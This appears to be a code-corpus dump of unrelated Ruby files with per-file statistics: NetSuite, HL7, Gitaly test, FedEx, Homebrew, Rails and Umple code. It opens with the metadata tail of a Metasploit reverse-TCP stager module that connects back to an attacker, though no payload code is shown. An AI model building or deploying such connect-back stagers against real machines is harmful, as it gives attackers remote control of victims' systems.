'Description' => 'Connect back to the attacker with UUID Support',
'Author' => [ 'hdm', 'OJ Reeves' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Convention' => 'sockedi',
'Stager' => { 'RequiresMidstager' => false }
))
end
#
# Override the uuid function and opt-in for sending the
# UUID in the stage.
#
def include_send_uuid
true
end
end
| 23.409091 | 72 | 0.634951 |
216452ae20e12c2a7afeeebf5fad2298e9e8d814 | 5,534 | module NetSuite
module Records
class NonInventorySaleItem
include Support::Fields
include Support::RecordRefs
include Support::Records
include Support::Actions
include Namespaces::ListAcct
actions :get, :get_deleted, :get_list, :add, :delete, :search, :update, :upsert
fields :available_to_partners,
:contingent_revenue_handling,
:cost_estimate,
:cost_estimate_type,
:cost_estimate_units,
:country_of_manufacture,
:created_date,
:defer_rev_rec,
:direct_revenue_posting,
:display_name,
:dont_show_price,
:enforce_min_qty_internally,
:exclude_from_sitemap,
:featured_description,
:handling_cost,
:handling_cost_units,
:hazmat_hazard_class,
:hazmat_id,
:hazmat_item_units,
:hazmat_item_units_qty,
:hazmat_packing_group,
:hazmat_shipping_name,
:include_children,
:is_donation_item,
:is_fulfillable,
:is_gco_compliant,
:is_hazmat_item,
:is_inactive,
:is_online,
:is_taxable,
:item_carrier,
:item_id,
:last_modified_date,
:manufacturer,
:manufacturer_addr1,
:manufacturer_city,
:manufacturer_state,
:manufacturer_tariff,
:manufacturer_tax_id,
:manufacturer_zip,
:matrix_item_name_template,
:matrix_type,
:max_donation_amount,
:maximum_quantity,
:meta_tag_html,
:minimum_quantity,
:minimum_quantity_units,
:mpn,
:mult_manufacture_addr,
:nex_tag_category,
:no_price_message,
:offer_support,
:on_special,
:out_of_stock_behavior,
:out_of_stock_message,
:overall_quantity_pricing_type,
:page_title,
:preference_criterion,
:prices_include_tax,
:producer,
:rate,
:related_items_description,
:sales_description,
:schedule_b_code,
:schedule_b_number,
:schedule_b_quantity,
:search_keywords,
:ship_individually,
:shipping_cost,
:shipping_cost_units,
:shopping_dot_com_category,
:shopzilla_category_id,
:show_default_donation_amount,
:sitemap_priority,
:soft_descriptor,
:specials_description,
:stock_description,
:store_description,
:store_detailed_description,
:store_display_name,
:upc_code,
:url_component,
:use_marginal_rates,
:vsoe_deferral,
:vsoe_delivered,
:vsoe_permit_discount,
:vsoe_price,
:vsoe_sop_group,
:weight,
:weight_unit,
:weight_units
record_refs :bill_exch_rate_variance_acct,
:billing_schedule,
:bill_price_variance_acct,
:bill_qty_variance_acct,
:klass,
:consumption_unit,
:cost_category,
:create_revenue_plans_on,
:custom_form,
:default_item_ship_method,
:deferred_revenue_account,
:department,
:income_account,
:issue_product,
:item_revenue_category,
:location,
:parent,
:pricing_group,
:purchase_tax_code,
:quantity_pricing_schedule,
:revenue_allocation_group,
:revenue_recognition_rule,
:rev_rec_forecast_rule,
:rev_reclass_f_x_account,
:rev_rec_schedule,
:sales_tax_code,
:sale_unit,
:ship_package,
:store_display_image,
:store_display_thumbnail,
:store_item_template,
:tax_schedule,
:units_type
field :custom_field_list, CustomFieldList
field :item_ship_method_list, RecordRefList
field :matrix_option_list, MatrixOptionList
field :pricing_matrix, PricingMatrix
field :subsidiary_list, RecordRefList
# TODO: field :accounting_book_detail_list, ItemAccountingBookDetailList
# TODO: field :hierarchy_versions_list, NonInventorySaleItemHierarchyVersionsList
# TODO: field :item_options_list, ItemOptionsList
# TODO: field :presentation_item_list, PresentationItemList
# TODO: field :product_feed_list, ProductFeedList
# TODO: field :site_category_list, SiteCategoryList
field :translations_list, TranslationList
attr_reader :internal_id
attr_accessor :external_id
def initialize(attributes = {})
@internal_id = attributes.delete(:internal_id) || attributes.delete(:@internal_id)
@external_id = attributes.delete(:external_id) || attributes.delete(:@external_id)
initialize_from_attributes_hash(attributes)
end
def self.search_class_name
"Item"
end
end
end
end
| 33.337349 | 90 | 0.559812 |
ffbfce8a74ed07d845d84a756ac702f37d55b901 | 370 | module HealthSeven::V2_6
class Icd < ::HealthSeven::DataType
# Certification Patient Type
attribute :certification_patient_type, Is, position: "ICD.1"
# Certification Required
attribute :certification_required, Id, position: "ICD.2", require: true
# Date/Time Certification Required
attribute :date_time_certification_required, Dtm, position: "ICD.3"
end
end | 37 | 73 | 0.781081 |
037734f1b13064ded88b2dc2746ec44a415aad35 | 1,773 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::GitalyClient::BlobService do
let(:project) { create(:project, :repository) }
let(:storage_name) { project.repository_storage }
let(:relative_path) { project.disk_path + '.git' }
let(:repository) { project.repository }
let(:client) { described_class.new(repository) }
describe '#get_new_lfs_pointers' do
let(:revision) { 'master' }
let(:limit) { 5 }
let(:not_in) { %w[branch-a branch-b] }
let(:expected_params) do
{ revision: revision, limit: limit, not_in_refs: not_in, not_in_all: false }
end
subject { client.get_new_lfs_pointers(revision, limit, not_in) }
it 'sends a get_new_lfs_pointers message' do
expect_any_instance_of(Gitaly::BlobService::Stub)
.to receive(:get_new_lfs_pointers)
.with(gitaly_request_with_params(expected_params), kind_of(Hash))
.and_return([])
subject
end
context 'with not_in = :all' do
let(:not_in) { :all }
let(:expected_params) do
{ revision: revision, limit: limit, not_in_refs: [], not_in_all: true }
end
it 'sends the correct message' do
expect_any_instance_of(Gitaly::BlobService::Stub)
.to receive(:get_new_lfs_pointers)
.with(gitaly_request_with_params(expected_params), kind_of(Hash))
.and_return([])
subject
end
end
end
describe '#get_all_lfs_pointers' do
subject { client.get_all_lfs_pointers }
it 'sends a get_all_lfs_pointers message' do
expect_any_instance_of(Gitaly::BlobService::Stub)
.to receive(:get_all_lfs_pointers)
.with(gitaly_request_with_params({}), kind_of(Hash))
.and_return([])
subject
end
end
end
| 29.065574 | 82 | 0.669487 |
87c3483a852c4027e00da5b8aef9733e8fd254ba | 2,194 | require "bigdecimal"
module FedexSMS
# TransactionField instances provide an interface to marshal/unmarshal individual fields of a
# FedEx Ship Manager Server transaction. Instances should be constructed with the specifications
# of the fields as defined in the FedEx Ship Manager Server Transaction and Coding Reference
# guide. An instance can then be used to dump values, formatting them according to the
# specification for use in building a transaction.
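# Example (hypothetical specification values; real ids, types, and lengths
# come from the coding reference guide):
#
#   spec = FedexSMS::FieldSpec.new(1, 'N', false, (1..10), nil, 'Transaction code')
#   FedexSMS::FieldSpec.parse('1,"021"') # => [1, nil, "021"]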
class FieldSpec
FIELD_FORMAT_REGEX = /\A(\d+)(-\d+)?,"([^"]*)"\z/
class FormatError < StandardError
def initialize(message, field_spec)
super("Transaction field error for #{field_spec.inspect}: #{message}")
end
end
attr_accessor :id, :type, :multiple_occurrence, :type, :len_range, :precision, :description
def self.parse(str)
raise ArgumentError, "Invalid transaction field #{str.inspect}" if str !~ FIELD_FORMAT_REGEX
id = Integer(Regexp.last_match(1), 10)
occurrence = Regexp.last_match(2)
occurrence = Integer(occurrence, 10) unless occurrence.nil?
value = Regexp.last_match(3)
[id, occurrence, value]
end
def initialize(id, type, multiple_occurrence, len_range, precision, description)
self.id = id
self.type = type
self.multiple_occurrence = multiple_occurrence
self.len_range = len_range
self.precision = precision
self.description = description
end
def load(str)
raise FormatError.new(str.inspect, self) unless str =~ FIELD_FORMAT_REGEX
unless Integer(Regexp.last_match(1)) == id
raise FormatError.new("incorrect field id in #{str.inspect}", self)
end
FieldValue.new(self, Regexp.last_match(2), Regexp.last_match(1))
end
def inspect
"%s(id: %d, multiple_occurrence: %s, len_range: %s, precision: %s, description: %s)" % [
self.class, id, multiple_occurrence, len_range, precision.inspect, description
]
end
private
def type=(type)
unless %w(A A/N N AKE).include?(type)
raise FormatError.new("invalid type: #{type.inspect}", self)
end
@type = type
end
end
end
| 33.753846 | 98 | 0.680036 |
621ded682e0762fdd93e4df95fd6c700ca20e406 | 725 | # frozen_string_literal: true
Gem::Specification.new do |spec|
spec.name = "devportal"
spec.version = "0.1.06"
spec.authors = ["fraser milne"]
spec.email = ["[email protected]"]
spec.summary = "theme for mimikgit.github.io/devportal"
spec.homepage = "https://github.com/mimikgit/devportal"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0").select { |f| f.match(%r!^(assets|_layouts|_includes|_sass|LICENSE|README)!i) }
spec.add_runtime_dependency "jekyll", "~> 3.7"
spec.add_development_dependency "bundler", "~> 1.16"
spec.add_development_dependency "rake", "~> 12.0"
spec.add_development_dependency "sass", "~> 3.5"
end
| 34.52381 | 132 | 0.642759 |
f7a09878f24a6d64d968b01a78bef7d2203e888e | 1,358 | #
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module Shell
module Commands
class List < Command
def help
return <<-EOF
List all tables in hbase. Optional regular expression parameter could
be used to filter the output. Examples:
hbase> list
hbase> list 'abc.*'
hbase> list 'ns:abc.*'
hbase> list 'ns:.*'
EOF
end
def command(regex = ".*")
formatter.header([ "TABLE" ])
list = admin.list(regex)
list.each do |table|
formatter.row([ table ])
end
formatter.footer(list.size)
return list
end
end
end
end
| 27.714286 | 74 | 0.691458 |
2198f92ebd5142a9d3d6ac8de371bdcb27b4c6a5 | 1,058 | #!/usr/bin/ruby -w
# PART 13
# The shuffle method rearranges all the items of the array.
# Say you have a deck of cards. You shuffle them randomly.
# Note that there's always a chance the shuffled order comes back
# identical to the original!
# That said, [1, 2].shuffle can return either [2, 1] or [1, 2] itself!
[1, 2].shuffle # => [2, 1]
a = Array.new(10, &:next) # => [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
p a # => [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
p a.shuffle # => [1, 2, 3, 10, 7, 5, 6, 8, 4, 9]
# The bang method does the same job, except it modifies the
# original array without modifying the object_id
p a.shuffle! # => [5, 1, 6, 4, 9, 3, 7, 8, 2, 10]
p a # => [5, 1, 6, 4, 9, 3, 7, 8, 2, 10]
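# shuffle also accepts a random number generator for reproducible results
# (a quick sketch; the seed 42 is arbitrary). The same seed yields the same order:
b = [1, 2, 3, 4, 5]
p b.shuffle(random: Random.new(42))
p b.shuffle(random: Random.new(42)) # same output as the line above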
| 55.684211 | 110 | 0.385633 |
e987ff699cd4402d55f7d1948a3cb9d2690bbfd3 | 553 | require 'rails_helper'
RSpec.describe Bike, type: :model do
let(:user) {FactoryBot.create(:user)}
let(:bike) {FactoryBot.create(:bike, :user => user)}
it 'user after Factory valid with valid attributes' do
expect(user).to be_valid
end
it 'bike after Factory valid with valid attributes' do
expect(bike).to be_valid
end
subject { bike }
describe 'bike must have all important attributes' do
it { expect(bike.name).to be }
it { expect(bike.volume).to be }
it { expect(bike.year).to be }
it { expect(bike.colour).to be }
end
end | 22.12 | 56 | 0.670886 |
019042e9cf0d5eab0f58631d402f5b60535c9c86 | 1,748 | class Pygtk < Formula
desc "GTK+ bindings for Python"
homepage "http://www.pygtk.org/"
url "https://download.gnome.org/sources/pygtk/2.24/pygtk-2.24.0.tar.bz2"
sha256 "cd1c1ea265bd63ff669e92a2d3c2a88eb26bcd9e5363e0f82c896e649f206912"
revision 1
bottle do
cellar :any
rebuild 2
sha256 "89f5d6762155b369dae255ba2b3952cc09f43f899585ff8694370b6b151ca97e" => :sierra
sha256 "bfea679c1a46b35c7788a692869ddb576c2869900d25b72f6cf91e25edc409a9" => :el_capitan
sha256 "7b008b213a675e96a83edb7b1be8401bbc9bbeb5db9a926104897f99a8d7d61e" => :yosemite
sha256 "603694d87d2c6193caa164029bc441d93d45cdcd75419c8f8ed11b0902577457" => :mavericks
sha256 "493f7a3a4eb8cb9eaeef1bcada556f6887511d6f3fe052710eefd7af117d2861" => :x86_64_linux # glibc 2.19
end
depends_on "pkg-config" => :build
depends_on "glib"
depends_on "gtk+"
depends_on "atk"
depends_on "pygobject"
depends_on "py2cairo"
depends_on "libglade" => :optional
def install
ENV.append "CFLAGS", "-ObjC" if OS.mac?
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
# Fixing the pkgconfig file to find codegen, because it was moved from
# pygtk to pygobject. But our pkgfiles point into the cellar and in the
# pygtk-cellar there is no pygobject.
inreplace lib/"pkgconfig/pygtk-2.0.pc", "codegendir=${datadir}/pygobject/2.0/codegen", "codegendir=#{HOMEBREW_PREFIX}/share/pygobject/2.0/codegen"
inreplace bin/"pygtk-codegen-2.0", "exec_prefix=${prefix}", "exec_prefix=#{Formula["pygobject"].opt_prefix}"
end
test do
(testpath/"codegen.def").write("(define-enum asdf)")
system "#{bin}/pygtk-codegen-2.0", "codegen.def"
end
end
| 39.727273 | 150 | 0.731693 |
627b09c3e377fa22f31cf5fe49cecaa720754291 | 1,050 | require 'boxzooka/inbound_request_item'
module Boxzooka
# Inbound data set is used to send notifications to our system of product inventory
# that you’re sending to Boxzooka.
# In practice, you must hit a CatalogRequest for all of the items listed here before the Inbound
# will be accepted.
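# Example (illustrative only; writer support comes from the scalar/collection
# declarations below):
#
#   request = Boxzooka::InboundRequest.new
#   request.container_id = 'CONTAINER-1'
#   request.carrier = 'FEDEX'
#   request.items = [Boxzooka::InboundRequestItem.new]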
class InboundRequest < BaseRequest
root node_name: 'Inbound'
# ID of incoming shipping container
scalar :container_id, node_name: 'ContainerID'
# Carrier being used for shipment
scalar :carrier
# Date/Time that shipment is estimated to arrive in our warehouse.
scalar :estimated_delivery_date, type: :datetime
# Purchase order number
scalar :po, node_name: 'PO'
# Tracking number of shipment
scalar :tracking_code
# Date/Time that inventory was shipped
scalar :ship_date, type: :datetime
# Items on the Inbound shipment.
collection :items,
flat: true,
entry_field_type: :entity,
entry_type: Boxzooka::InboundRequestItem,
entry_node_name: 'Item'
end
end
| 27.631579 | 98 | 0.719048 |
ffe389ef0eb339f7bb03593f33c0ab71b16f2a99 | 872 | # PLEASE DO NOT EDIT THIS CODE
# This code was generated using the UMPLE 1.31.1.5860.78bb27cc6 modeling language!
# NOTE: Ruby generator is experimental and is missing some features available
# in other Umple generated languages like Java or PHP
module CruiseAttributesTest
require 'date'
require 'time'
class ConstDefault
#------------------------
# STATIC VARIABLES
#------------------------
I1 = 0;
I2 = 0;
D1 = 0.0;
D2 = 0.0;
F1 = 0.0;
F2 = 0.0;
B1 = false;
B2 = false;
STR = "";
DATE = Date.parse("2021-10-26");
TIME = Time.parse("00:00:00");
#------------------------
# CONSTRUCTOR
#------------------------
def initialize()
@initialized = false
@deleted = false
@initialized = true
end
#------------------------
# INTERFACE
#------------------------
def delete
@deleted = true
end
end
end | 18.166667 | 82 | 0.533257 |
e9d3dbe9db3e3e6c7b87a48218165186bf5eb420 | 1,993 | require 'rails_helper'
# This spec was generated by rspec-rails when you ran the scaffold generator.
# It demonstrates how one might use RSpec to test the controller code that
# was generated by Rails when you ran the scaffold generator.
#
# It assumes that the implementation code is generated by the rails scaffold
# generator. If you are using any extension libraries to generate different
# controller code, this generated spec may or may not pass.
#
# It only uses APIs available in rails and/or rspec-rails. There are a number
# of tools you can use to make these specs even more expressive, but we're
# sticking to rails and rspec-rails APIs to keep things simple and stable.
<% module_namespacing do -%>
RSpec.describe "PATCH /<%= name.underscore.pluralize %>/:id", <%= type_metatag(:request) %> do
<% if mountable_engine? -%>
include Engine.routes.url_helpers
<% end -%>
let!(:<%= name.underscore %>) {create(:<%= name.underscore %>)}
context "with valid parameters" do
let(:new_attributes) {
skip("Add a hash of attributes valid for your model")
}
it "updates the requested <%= ns_file_name %>" do
patch <%= show_helper.tr('@', '') %>, params: { <%= singular_table_name %>: new_attributes }
<%= file_name %>.reload
skip("Add assertions for updated state")
end
it "redirects to the <%= ns_file_name %>" do
patch <%= show_helper.tr('@', '') %>, params: { <%= singular_table_name %>: new_attributes }
<%= file_name %>.reload
expect(response).to redirect_to(<%= singular_table_name %>_url(<%= file_name %>))
end
end
context "with invalid parameters" do
let(:invalid_attributes) {
skip("Add a hash of attributes invalid for your model")
}
it "renders a successful response (i.e. to display the 'edit' template)" do
patch <%= show_helper.tr('@', '') %>, params: { <%= singular_table_name %>: invalid_attributes }
expect(response).to be_successful
end
end
end
<% end -%>
| 38.326923 | 102 | 0.680381 |
f81ad0011ac4f15d0eb3243992550d68367ac0af | 351 | # Delineate the directory for SASS/SCSS files
sass_path = File.dirname(__FILE__);
# Delineate the CSS dir
css_path = File.join(sass_path, '..', 'css')
# Delineate the images dir
images_dir = File.join(sass_path, '..', 'img')
# Add the css directory to the Compass load path
load File.join(sass_path, '..', 'css')
output_style = :compressed
environment = :production | 31.909091 | 46 | 0.729345 |
b919c01ce73ec6bc9d4a61f1b5caae646655c866 | 427 | class MiqRetireRequest < MiqRequest
# subclasses must set this
SOURCE_CLASS_NAME = nil
validates :request_state, :inclusion => { :in => %w(pending finished) + ACTIVE_STATES, :message => "should be pending, #{ACTIVE_STATES.join(", ")} or finished" }
validate :must_have_user
default_value_for(:source_id) { |r| r.get_option(:src_id) }
default_value_for :source_type, SOURCE_CLASS_NAME
def my_zone
end
end
| 30.5 | 163 | 0.725995 |
399209e8fe688d54aedd49fdff1a870dcda5cc6f | 112 | FactoryBot.define do
factory :user do
email { '[email protected]' }
password { 'my-password' }
end
end
| 16 | 30 | 0.642857 |